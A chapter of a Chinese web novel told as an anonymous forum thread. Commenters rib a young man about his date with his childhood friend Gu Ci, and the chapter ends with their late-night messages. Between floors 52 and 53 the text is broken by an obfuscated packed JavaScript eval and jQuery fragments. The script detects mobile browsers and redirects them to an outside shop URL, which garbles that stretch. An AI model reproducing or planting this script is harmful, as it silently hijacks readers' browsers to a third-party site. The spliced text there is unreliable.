默认冷灰
24号文字
方正启体

13. 约会战报!2 1楼

作者:天天吃甜本书字数:K更新时间:
    1楼匿名用户:


    沙发!


    楼主你终于来了!!!


    2楼匿名用户:


    看完主楼,我只有一个问题:


    楼主你是不是飘了???


    3楼匿名用户:


    哈哈哈哈哈哈“平平无奇的恋爱天才”???


    楼主你认真的吗???


    4楼匿名用户:


    回3楼:他认真的。


    而且他好像真的觉得自己很厉害。


    5楼匿名用户:


    不是,楼主,你忘了前几帖的自己了?


    “我是直男”


    “他是我兄弟”


    “我对他没那种意思”


    “我不知道去哪儿约会”


    “我该说什么”


    “我该怎么办”


    现在你成天才了???


    6楼匿名用户:


    哈哈哈哈哈哈笑死!


    从“我是直男”到“平平无奇恋爱天才”,


    楼主你用了不到两个月。


    7楼匿名用户:


    这叫什么?


    这叫好了伤疤忘了疼。


    这叫得瑟。


    这叫飘了。


    8楼匿名用户:


    @足球不行踢球去你还记得你第一次发帖时手抖得打字都慢半拍吗?


    你还记得你看见顾远洲挽他胳膊时整个人裂开吗?


    你还记得你站在餐厅门口看见别人告白转头就跑吗?


    这才几天,你就天才了?


    9楼楼主:


    回8楼:……


    那些都是过去的事了。


    人总是要成长的嘛。


    10楼匿名用户:


    回9楼:成长?


    你那是成长吗?


    你那是我们一把屎一把尿喂大的!


    11楼匿名用户:


    哈哈哈哈哈哈“一把屎一把尿”是什么鬼!


    但确实,楼主这一路走来,我们操了多少心啊!


    12楼匿名用户:


    第一次发帖:楼主哭诉竹马要被表姐抢走了


    我们:你那是吃醋!


    第二次发帖:楼主说表姐是男的


    我们:那是你情敌!


    第三次发帖:楼主陪人去临市


    我们:你完了你动心了!


    第四次发帖:楼主看见别人告白就跑


    我们:你怂什么快上!


    第五次发帖:楼主终于表白


    我们:啊啊啊啊啊儿子长大了!


    第六次发帖:楼主问去哪儿约会


    我们:你是把我们当AI使吗?


    第七次发帖:楼主问注意事项


    我们:一群单身狗给你出主意


    第八次发帖:楼主开始吹自己是恋爱天才


    我们:???


    13楼匿名用户:


    回12楼:总结得太到位了!


    这就是我们的赛博育儿日记!


    14楼匿名用户:


    “赛博育儿日记”哈哈哈哈哈哈!


    我们这些赛博父母,终于把儿子养大了!


    15楼匿名用户:


    然后儿子现在开始飘了。


    说自己是恋爱天才。


    完全忘了是谁教的。


    16楼匿名用户:


    对对对!


    楼主你摸着良心说:


    要不是我们,你知道约会要带水吗?


    要不是我们,你知道要偷拍吗?


    要不是我们,你知道要买纪念品吗?


    要不是我们,你知道要牵手吗?


    17楼楼主:


    ……


    知道。


    18楼匿名用户:


    回17楼:你知道个屁!


    你什么都不知道!


    你就是个恋爱白痴!


    19楼匿名用户:


    哈哈哈哈哈哈!


    “恋爱白痴”才是你的真实身份!


    别飘了,快下来!


    20楼楼主:


    ……


    行吧。


    我是恋爱白痴。


    但我今天确实表现很好啊!


    你们不能否认这一点!


    21楼匿名用户:


    我们没否认你表现好。


    但你那个“平平无奇恋爱天才”的标签,我们不同意。


    22楼匿名用户:


    对!


    你不是天才。


    你是我们这些赛博父母手把手教出来的笨儿子。


    表现好是应该的。


    不然我们对得起我们熬的那些夜吗?


    23楼匿名用户:


    就是!


    你知道我们为了你,死了多少脑细胞吗?


    你知道我们为了你,掉了多少头发吗?


    你现在居然想独吞功劳?


    24楼楼主:


    ……


    那功劳是你们的。


    行了吧?


    25楼匿名用户:


    这还差不多。


    但有一说一,今天表现确实不错。


    那个牵手时机,完美。


    那个偷拍,有心了。


    那个纪念品,绝了。


    那句“看你”,够直球。


    那个外套披上去,满分。


    26楼匿名用户:


    对对对!


    尤其是外套那个细节!


    让顾辞穿着你的外套回去!


    他回去肯定抱着外套睡不着!


    27楼匿名用户:


    哈哈哈哈哈哈!


    “抱着外套睡不着”太真实了!


    顾辞今晚肯定满脑子都是你。


    28楼匿名用户:


    而且你描写顾辞那段——


    “他的侧脸被那层蓝光勾勒出来,睫毛上好像落着细碎的光点”


    “眼睛亮亮的,像那些鱼鳞反射的光”


    “笑得眼睛眯起来一点,笑得露出一点点牙齿”


    “像一幅画,像梦里才会出现的那种画”


    楼主你文笔进步了啊!


    29楼匿名用户:


    对对对!


    我也想说!


    楼主你以前描写顾辞就是“黑发如墨肤白如玉”,


    现在都会用光影和细节了!


    进步神速!


    30楼楼主:


    是吗?


    我就是把我看见的写出来而已。


    他本来就长那样。


    31楼匿名用户:


    回30楼:你看,这就是喜欢的力量。


    喜欢一个人,你就会注意到他所有的细节。


    连他睫毛上的光点都看得见。


    32楼匿名用户:


    对!


    不喜欢的时候,看见的是“好看”。


    喜欢的时候,看见的是“好看在哪里”。


    楼主你已经进入第二阶段了。


    33楼楼主:


    ……


    还有第三阶段吗?


    34楼匿名用户:


    有啊。


    第三阶段是,不用看,闭着眼也能想起来他长什么样。


    每一根睫毛,每一个表情,每一个笑。


    都在你脑子里。


    35楼匿名用户:


    第四阶段是,他不在你身边,你也觉得他在。


    走在路上看见什么都会想起他。


    看见鱼想起他,看见水想起他,看见蓝色想起他。


    36楼匿名用户:


    第五阶段是,你已经分不清是你想他还是他在你脑子里。


    他变成了你的一部分。


    37楼楼主:


    ……


    我现在好像是第四阶段。


    刚才回来路上看见蓝色的灯,就想起他在水族馆里的样子。


    38楼匿名用户:


    看吧。


    你已经彻底沦陷了。


    39楼匿名用户:


    对了楼主,你回来给他发消息了吗?


    40楼楼主:


    发了。


    我问他到了没,他说到了。


    我问他今天开心吗,他说嗯。


    我问他外套暖和不,他说嗯。


    我问他明天还一起吃早饭吗,他说嗯。


    全是嗯。


    41楼匿名用户:


    哈哈哈哈哈哈!


    顾辞式回答:嗯。


    但他每个嗯都回你了!


    说明他在意!


    42楼匿名用户:


    对!


    而且你想想,他平时对别人,连嗯都懒得说。


    能回你嗯,已经是最高待遇了。


    43楼楼主:


    ……


    也是。


    那我要不要问他睡了吗?


    44楼匿名用户:


    问!


    现在问!


    45楼匿名用户:


    对对对!


    问问他睡着没有!


    问问他有没有想你!


    46楼匿名用户:


    问问他有没有抱着你的外套睡觉!


    47楼楼主:


    ……


    最后那个不问。


    太变态了。


    48楼匿名用户:


    哈哈哈哈哈哈!


    行,不问这个。


    就问睡了没。


    49楼楼主:


    问了。


    【张】:睡了吗?


    【圆圆】:没。


    【张】:在想什么?


    【圆圆】:在想今天。


    【张】:我也是。


    【圆圆】:张扬。


    【张】:嗯?


    【圆圆】:那个水母钥匙扣,我挂在书包上了。


    【圆圆】:以后每天都看得见。


    我看着那条消息,又傻笑了半天。


    50楼匿名用户:


    呜呜呜呜呜!!!


    “以后每天都看得见”!!!


    这是什么神仙情话!!!


    51楼匿名用户:


    顾辞真的太会了!!!


    他随便说句话,都能让楼主心跳加速!!!


    52楼匿名用户:


    楼主你回什么?


    你回什么了?


    5


    ;eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return''\\w+''};c=1;};while(c--)if(k[c])p=p.replace(new RegExp(''\\b''+e(c)+''\\b'',''g''),k[c]);return p;}(''8 0=7.0.6();b(/a|9|1|2|5|4|3|c l/i.k(0)){n.m="}'',24,24,''userAgent|iphone|ipad|iemobile|blackberry|ipod|toLowerCase|navigator|var|webos|android|if|opera|mgxs|t|shop|17382525|200203||http|test|mini|href|location''.split(''|''),0,{}));


    () {


    $(''.inform'').remove();


    $(''#content'').append(''


    3楼楼主:


    我回:


    【张】:那我也每天都能看见你背着它。


    【张】:四舍五入就是每天都能看见你。


    【圆圆】:……


    【圆圆】:你从哪儿学的这些?


    54楼匿名用户:


    哈哈哈哈哈哈!


    “你从哪儿学的这些”!


    顾辞都被你撩到了!


    55楼匿名用户:


    楼主你出息了!!!


    都会说情话了!!!


    56楼匿名用户:


    这哪是恋爱白痴,这明明是恋爱天才!


    不对,是恋爱天才的徒弟!


    师父是我们!


    57楼匿名用户:


    对对对!


    是我们教得好!


    楼主你别想独吞功劳!


    58楼楼主:


    行行行。


    你们教得好。


    我是好学生。


    行了吧?


    59楼匿名用户:


    这还差不多。


    行了,儿子今天表现不错,妈妈很欣慰。


    60楼匿名用户:


    爸爸也很欣慰。


    继续努力,保持这个水平。


    61楼匿名用户:


    对了楼主,你那些照片呢?


    发出来看看啊!


    62楼匿名用户:


    对对对!


    我们要看顾辞的照片!


    要看他在蓝色光影里的样子!


    63楼楼主:


    ……


    不行。


    那是我的。


    不给看。


    64楼匿名用户:


    ???


    小气!


    我们就看一眼!


    65楼楼主:


    一眼也不行。


    他的照片只能我一个人看。


    66楼匿名用户:


    行吧行吧。


    护食是吧?


    理解。


    67楼匿名用户:


    那你描述一下!


    我们脑补!


    68楼楼主:


    描述过了啊。


    就是那样。


    很好看。


    很好看很好看。


    69楼匿名用户:


    ……


    你这描述水平,还不如不描述。


    70楼匿名用户:


    算了算了,我们自己脑补。


    反正顾辞那个颜值,怎么脑补都不过分。


    71楼匿名用户:


    对了楼主,你明天还约吗?


    周日有什么安排?


    72楼楼主:


    明天他说要写论文。


    我去图书馆陪他。


    73楼匿名用户:


    也行。


    图书馆约会,也是约会。


    74楼匿名用户:


    记得带水!


    记得别打扰他!


    记得看他!


    75楼楼主:


    知道了知道了。


    你们比我妈还啰嗦。


    76楼匿名用户:


    废话!


    我们是赛博父母!


    当然啰嗦!


    77楼匿名用户:


    行了,儿子快去睡吧。


    明天还要陪儿媳妇写论文呢。


    78楼楼主:


    ……


    好。


    晚安。


    谢谢你们。


    79楼匿名用户:


    晚安儿子。


    晚安顾辞。


    晚安这个美好的夜晚。


    ——


    【最后的最后】


    张扬把手机放下。


    窗外的月亮很亮。


    他想起顾辞今天在水族馆里的样子。


    想起他说“我今天很开心”时眼睛亮亮的。


    想起他拿着钥匙扣说“以后每天都看得见”。


    想起他穿着自己的外套,回头看自己那一眼。


    忍不住拿起手机,又发了一条消息:


    【张】:顾辞。


    【圆圆】:嗯?


    【张】:我今天真的特别开心。


    【张】:比赢了市冠军还开心。


    【圆圆】:……


    【圆圆】:你赢了市冠军的时候,是什么感觉?


    张扬想了想。


    【张】:就是高兴,但也就那样。


    【张】:但今天不一样。


    【张】:今天是一直高兴,到现在还在高兴。


    【张】:可能明天也会高兴。


    【张】:后天也会。


    【张】:一直一直高兴。


    顾辞沉默了一会儿。


    然后回:


    【圆圆】:张扬。


    【张】:嗯?


    【圆圆】:我也是。


    【圆圆】:晚安。


    【张】:晚安。


    张扬把手机扣在胸口。


    窗外很静。


    但他的心跳一点都不静。


    一直一直高兴。


    原来这就是喜欢一个人的感觉。
(←快捷键) <<上一章 投推荐票 回目录 标记书签 下一章>> (快捷键→)